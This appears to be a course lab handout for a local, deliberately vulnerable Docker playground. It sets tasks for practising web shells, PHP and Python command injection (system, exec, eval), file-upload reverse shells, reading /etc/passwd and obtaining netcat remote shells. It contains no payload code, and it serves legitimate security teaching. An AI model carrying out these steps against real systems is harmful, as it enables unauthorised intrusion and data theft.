Skip to content

Web Based shell Playground

Our second set of lab tasks is based around web based shells.

The Web Shell playground has both PHP and Python based web servers for you to practice using web shells and RCE.

#Get to wherever your github is
$ cd <github>

$ cd /week2/WebShellPlayground
$ docker-compose up

You will now have a:

  • PHP based server on port 80
  • Python / Flask server on port 5000

Activity 1: PHP Based shells

For this task you will want to use PHP based server on port 80 (it will be on localhost)

PHP Shell Playground

Simpletask

The first two links let you try out "preinstalled" versions of p0wny shell, and the pentest monkey shell.

It should give you a feel of how the two different approaches work, what they are capable of etc.

The RCE pages look at simple remote code execution flaws. Each of the pages will let you run commands via the form input, without any input sanitisation to get in the way.

There are two versions of the RCE page

  • RCE This version of the page triggers the RCE via the system() function. This means that the output of the command will be visible

  • Blind RCE Here we use the exec() command. This will still execute, but wont display the output. While this can be a pain there are a couple of ways around it1 Do a bit of research, see what solutions you can come up with

Task

Try both of the RCE methods to get a feel for how they work. I suggest doing the following:

  • Execute a system command (for example id)
  • Read a file (for example /etc/passwd)
  • Write to a file
  • Use RCE to get a netcat remote shell

Hardtask

Typing stuff into a URL / form is tiresome Create a simple python script that interacts with the server for you.

For bonus points, get it to download a shell from your machine, and execute it

Activity 2: PHP Based file upload

The final thing to try on our PHP based system is getting a reverse shell via file upload.

There is no input sanitiation to get in your way, so all you have to do is upload the file, then find it in the /uploads/ directory

Task

Get a shell through file upload.

  • Try Both the P0wny and Pentest Monkey Shells

Activity 3: Python based RCE

In the python shell playground (127.0.0.1:5000) we have two different types of RCE for you to play with.

The first is Subprocess based. Its reasonalby straghtforward, as we can just run system commands in the same way that we did with PHP

Easytask

Try RCE in python using to get a feel for how it works. I suggest doing the following:

  • Execute a system command (for example id)
  • Read a file (for example /etc/passwd)
  • Write to a file
  • Use RCE to get a netcat remote shell

Our second challenge uses the eval command to execute the code. This gives is a bit more of a challenge as it means that some payloads, while they execute the code, may not give us any output. It will be good practice for SSTI, and any Python sandbox escapes though :p

Task

Try the Eval based Python RCE.

First you should try to find a way of getting some meaningful output. As we have access to the docker logs (which will usually show the output of the commands), you can use those to help you check the commands are working in the background.

  • Execute a system command (for example id)
  • Read a file (for example /etc/passwd)
  • Write to a file
  • Use RCE to get a netcat remote shell

Hardtask

Try to get a pure python shell using the eval approach.

  1. Obviously you will need to "pretend" you don't know anything about the system here. It might be tempting to cheat, but thats not going to help if you hit this in the real world2. Try replicating the same enumeration process used to find commands as you would use for a RCE that shows output. 

  2. Also I dont like people who cheat, you might have guessed that. 

Back to top